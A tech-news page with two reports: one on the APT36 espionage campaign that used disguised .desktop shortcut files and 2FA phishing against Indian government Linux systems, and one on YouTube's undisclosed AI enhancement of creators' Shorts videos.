Image by Li Zhang, from Unsplash

Fake Meeting Files Used In Cyber Espionage Campaign Against India

• Written by Kiara Fabbri Former Tech News Writer
• Fact-Checked by Sarah Frazier Former Content Manager

APT36 hackers from Pakistan have been found using weaponized shortcut files, phishing, malware, and 2FA theft to attack BOSS Linux systems in India.

In a rush? Here are the quick facts:

• APT36 is targeting India’s BOSS Linux systems with fake .desktop files.
• The malware downloads hidden payloads while showing a decoy PDF in Firefox.
• Researchers linked the attack to Poseidon backdoor for spying and credential theft.

The Pakistan-based hacker group APT36 also known as Transparent Tribe has started a new cyber-espionage operation against Indian government systems , according to research by CYFIRMA .

The group has created malware designed for India’s BOSS Linux operating system, demonstrating their growing capability to adapt to different environments.

The attack begins with spear phishing emails containing a file named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.” Once opened, it reveals a fake shortcut file called “Meeting_Ltr_ID1543ops.pdf.desktop.” Though it looks like a harmless PDF, the file is programmed to secretly download malicious software.

“The ‘.desktop’ file shown is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched. This enables the attacker to perform covert actions while keeping the victim unaware,” the researchers explained.

The malware employs deceiving methods to remain undetected by opening a genuine PDF in Firefox which makes users believe nothing suspicious occurred.

The hidden program operates in stealth mode stealing data, and sets itself to restart every time the computer is turned on.

The malicious files discovered by CYFIRMA connect to two newly registered domains “securestore[.]cv” and “modgovindia[.]space” which serve as command-and-control servers for the attackers. Through these servers hackers can transmit commands and obtain stolen data while maintaining their access to government networks.

Hacker News reports that this campaign shows APT36’s growing sophistication. In addition to targeting Linux BOSS, the group has also developed Windows malware in the same campaign, demonstrating a dual-platform approach.

The malicious code performs system reconnaissance while executing fake anti-debugging and anti-sandbox checks to avoid detection, according to CloudSEK . The attacks led to the deployment of the Transparent Tribe backdoor Poseidon, which allows attackers to steal credentials, and conduct long-term surveillance, as well as network lateral movement inside government networks, as reported by Hunt.io researchers.

Hacker News notes that activity comes shortly after Transparent Tribe was caught targeting Indian defense organizations through spoofed login portals designed to steal credentials and even Kavach, the Indian government’s two-factor authentication (2FA) system.

Victims entering their email and Kavach codes on the phishing sites unknowingly handed over login data directly to attackers.

CYFIRMA noted: “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.

CYFIRMA warned that “the analysis indicates a coordinated cyber-espionage campaign attributed to APT36, leveraging weaponized .desktop files to target BOSS Linux environments within Indian Government entities.”

Image by Leon Bubliz, from Unsplash

YouTube Secretly Used AI To Alter Creators’ Videos Without Permission

• Written by Kiara Fabbri Former Tech News Writer
• Fact-Checked by Sarah Frazier Former Content Manager

YouTube has admitted to quietly using AI to alter videos without telling creators, sparking concerns about trust and reality in online content.

In a rush? Here are the quick facts:

• Subtle edits included sharpening, smoothing skin, and warping details.
• Creators noticed strange changes.
• YouTube confirmed AI tests on Shorts to “improve clarity.”

“I was like ‘man, my hair looks strange […] And the closer I looked it almost seemed like I was wearing makeup” he said to the BBC , who first investigated this story. he added. At first, he wondered if he was just imagining things. But he wasn’t.

In recent months, YouTube has used AI to sharpen images, smooth skin, and even warp ears in subtle ways. The modifications remain difficult to detect when viewed independently but numerous content creators believe these changes produce an artificial appearance that resembles AI-generated content.

“The more I looked at it, the more upset I got […] If I wanted this terrible over-sharpening I would have done it myself. But the bigger thing is it looks AI-generated. I think that deeply misrepresents me and what I do and my voice on the internet. It could potentially erode the trust I have with my audience in a small way. It just bothers me.” says music YouTuber Rhett Shull, as reported to BBC.

Shull produced a video showcasing these changes:

After months of speculation, YouTube confirmed the edits were part of a test on Shorts. “We’re running an experiment on select YouTube Shorts that uses traditional machine learning technology to unblur, denoise and improve clarity in videos,” said Rene Ritchie, YouTube’s head of editorial and creator liaison, as reported by BBC.

But experts warn it’s more than just a technical tweak. “This case with YouTube reveals the ways in which AI is increasingly a medium that defines our lives and realities,” says Samuel Wooley of the University of Pittsburgh, as reported by BBC.

Wooley adds, “What happens if people know that companies are editing content from the top down, without even telling the content creators themselves?”